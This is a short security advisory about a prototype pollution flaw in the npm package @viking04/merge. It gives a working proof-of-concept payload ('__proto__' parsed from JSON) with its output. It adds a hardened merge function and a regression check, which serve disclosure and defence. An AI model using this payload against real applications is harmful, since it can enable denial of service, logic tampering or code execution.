The npm package @viking04/merge is vulnerable to Prototype Pollution.
More details on the vulnerability: https://medium.com/node-modules/what-is-prototype-pollution-and-why-is-it-such-a-big-deal-2dd8d89a93c
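// Proof of concept: merge an object parsed from untrusted JSON
var merge = require("@viking04/merge")
var a = {"a":{"red":"apple"}}
var b = {"b":{"yellow":"mango"}}
// JSON.parse creates "__proto__" as an own property, so merge() treats it as a regular key
var c = JSON.parse('{"__proto__":{"polluted":true}}')
console.log("Before:"+{}.polluted)
merge(a,b,c)
// A fresh object literal now inherits "polluted" from Object.prototype
console.log("After:"+{}.polluted)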
"Before:undefined"
"After:true"
Depending on how the application uses the affected objects, this may lead to denial of service (DoS), remote code execution, changes to business logic, information disclosure, or XSS.
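The usual fix for this class of bug is to skip the prototype-related keys during the recursive merge. The sketch below is an added example, not code from the package or the original report: `naiveMerge` is a constructed stand-in for an unguarded recursive merge (the package's real source is not shown on this page), `safeMerge` is one hardened form, and `pollutes` is a hypothetical helper that replays the report's payload against either one.

```javascript
// Added example. All function names here are hypothetical, not the package's API.
const isPlainObject = (v) => v !== null && typeof v === 'object' && !Array.isArray(v);

// Constructed stand-in for an unguarded recursive merge.
function naiveMerge(target, ...sources) {
  for (const src of sources) {
    for (const key in src) {
      if (isPlainObject(src[key])) {
        // target["__proto__"] resolves to Object.prototype, so recursion writes into it
        if (!isPlainObject(target[key])) target[key] = {};
        naiveMerge(target[key], src[key]);
      } else {
        target[key] = src[key];
      }
    }
  }
  return target;
}

// Hardened form: own keys only, prototype-related keys skipped.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function safeMerge(target, ...sources) {
  for (const src of sources) {
    for (const key of Object.keys(src)) {
      if (BLOCKED_KEYS.has(key)) continue;
      const val = src[key];
      if (isPlainObject(val)) {
        // Never recurse into an inherited value; create an own property first
        const own = Object.prototype.hasOwnProperty.call(target, key);
        if (!own || !isPlainObject(target[key])) target[key] = {};
        safeMerge(target[key], val);
      } else {
        target[key] = val;
      }
    }
  }
  return target;
}

// Replays the payload from the report and says whether Object.prototype was modified.
function pollutes(mergeFn) {
  const a = { a: { red: 'apple' } };
  const b = { b: { yellow: 'mango' } };
  const c = JSON.parse('{"__proto__":{"polluted":true}}');
  const merged = mergeFn(a, b, c);
  const polluted = ({}).polluted === true;
  delete Object.prototype.polluted; // restore the global prototype after the check
  return { polluted, merged };
}

console.log('naiveMerge pollutes:', pollutes(naiveMerge).polluted);
console.log('safeMerge pollutes:', pollutes(safeMerge).polluted);
```

The same `pollutes` check can serve as a regression test for any merge helper an application depends on.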